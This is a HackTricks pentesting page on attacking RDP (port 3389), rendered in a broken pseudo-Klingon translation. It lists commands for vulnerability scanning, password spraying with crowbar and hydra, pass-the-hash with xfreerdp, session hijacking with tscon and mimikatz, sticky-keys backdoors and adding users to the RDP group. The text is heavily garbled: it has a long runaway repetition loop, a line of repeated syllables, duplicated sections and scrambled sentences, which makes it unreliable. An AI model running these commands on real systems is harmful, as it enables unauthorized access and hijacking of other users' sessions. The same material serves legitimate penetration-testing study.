hacktricks/network-services-pentesting/pentesting-rdp.md

3389 - Pentesting RDP

htARTE (HackTricks AWS Red Team Expert) ! jImej

jIHDaj:

• HackTricks vItlhutlh tlhIngan Hol DIS 'ej HackTricks PDF ghItlhvam 'oH tlhIngan Hol DIS SUBSCRIPTION PLANS ghItlhvam!
• PEASS & HackTricks swag ghItlhvam
• The PEASS Family ghItlhvam NFTs ghItlhvam
• Discord group 'ej telegram group ghItlhvam Twitter carlospolopm jImej
• HackTricks PRs HackTricks Cloud github repos ghItlhvam

vulnerability assessment & penetration testing Instantly available setup. 20+ tools & features recon to reporting full pentest Run. pentesters replace we develop custom tools, detection & exploitation modules dig deeper, pop shells, and have fun.

{% embed url="https://pentest-tools.com/" %}

Basic Information

Remote Desktop Protocol (RDP) Microsoft Developed, graphical interface connection enable designed. network computers between connection such a establish. RDP client software user utilized, concurrently, RDP server software operate required computer remote. allows setup environment, desktop computer's distant access control seamless essentially interface user's local device.

Default port: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Enumeration

Automatic

{% code overflow="wrap" %}## Enumeration

Automatic

{% code overflow="wrap" %}

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

{% endcode %}

ghItlhvam: Qap, DoS vItlhutlh 'ej NTLM Windows tlhIngan (version) ghItlhvam 'ej DoS ghItlhvam 'e' tlhIngan ghItlhvam 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH 'e' 'ej 'oH **'

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Qa'vamDI' 'e' yIDel

Connect with known credentials

If you have valid credentials for an RDP (Remote Desktop Protocol) service, you can use them to connect to the target system. The credentials typically consist of a username and password.

To connect using known credentials, follow these steps:

1. Open the RDP client software on your machine.
2. Enter the IP address or hostname of the target system.
3. Provide the username and password in the appropriate fields.
4. Click on the "Connect" button to establish the RDP session.

If the provided credentials are correct, you will be granted access to the remote system.

Connect with known hash

In some cases, you may only have access to the hash of the password instead of the actual password itself. In such situations, you can use tools like hashcat or John the Ripper to crack the hash and obtain the plaintext password.

Once you have the plaintext password, you can follow the steps mentioned above to connect to the target system using the known credentials.

Remember to always obtain proper authorization before attempting to connect to any system using known credentials or hashes. Unauthorized access is illegal and unethical.

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

RDP tInwI'pu' RDP tIq 'e' vItlhutlh

rdp_check.py from impacket RDP tIq 'e' vItlhutlh:

rdp_check <domain>/<name>:<password>@<IP>

**Qapvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamvamv

query user

Qa'vIn DaH jImej

tscon <ID> /dest:<SESSIONNAME>

nuqneH, jImej RDP session'e' vItlhutlh. 'ej Windows tools 'ej features vItlhutlhlaHbe'chugh user impersonate.

Qap: RDP session vItlhutlhlaHbe'chugh user vItlhutlhlaHbe'chugh.

process dumping vItlhutlhlaHbe'chugh passwords ghaH, 'ach 'oH method vItlhutlhlaHbe'chugh 'ej virtual desktops user (passwords notepad without been saved in disk, RDP sessions opened in other machines...)

Mimikatz

mimikatz vItlhutlhlaHbe'chugh:

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

Sticky-keys & Utilman

Combining this technique with stickykeys or utilman you will be able to access a administrative CMD and any RDP session anytime

You can search RDPs that have been backdoored with one of these techniques already with: https://github.com/linuz/Sticky-Keys-Slayer

RDP Process Injection

If someone from a different domain or with better privileges login via RDP to the PC where you are an Admin, you can inject your beacon in his RDP session process and act as him:

{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} rdp-sessions-abuse.md {% endcontent-ref %}

Adding User to RDP group

tlhIngan Hol translation:

Sticky-keys & Utilman

Combining this technique with stickykeys or utilman you will be able to access a administrative CMD and any RDP session anytime

You can search RDPs that have been backdoored with one of these techniques already with: https://github.com/linuz/Sticky-Keys-Slayer

RDP Process Injection

If someone from a different domain or with better privileges login via RDP to the PC where you are an Admin, you can inject your beacon in his RDP session process and act as him:

{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} rdp-sessions-abuse.md {% endcontent-ref %}

Adding User to RDP group

net localgroup "Remote Desktop Users" UserLoginName /add

Automatic Tools

• AutoRDPwn

AutoRDPwn vIghoS'a' post-exploitation framework Powershell Daq, Microsoft Windows computers Shadow attack automate primarily designed. vulnerability (Microsoft listed as a feature) remote attacker view his victim's desktop without his consent allows, even control it on demand, using tools native to the operating system itself.

• EvilRDP
• Control mouse and keyboard in an automated way from command line
• Control clipboard in an automated way from command line
• Spawn a SOCKS proxy from the client that channels network communication to the target via RDP
• Execute arbitrary SHELL and PowerShell commands on the target without uploading files
• Upload and download files to/from the target even when file transfers are disabled on the target

HackTricks Automatic Commands

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.

https://book.hacktricks.xyz/pentesting/pentesting-rdp

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}

vulnerability assessment & penetration testing. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.

{% embed url="https://pentest-tools.com/" %}

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.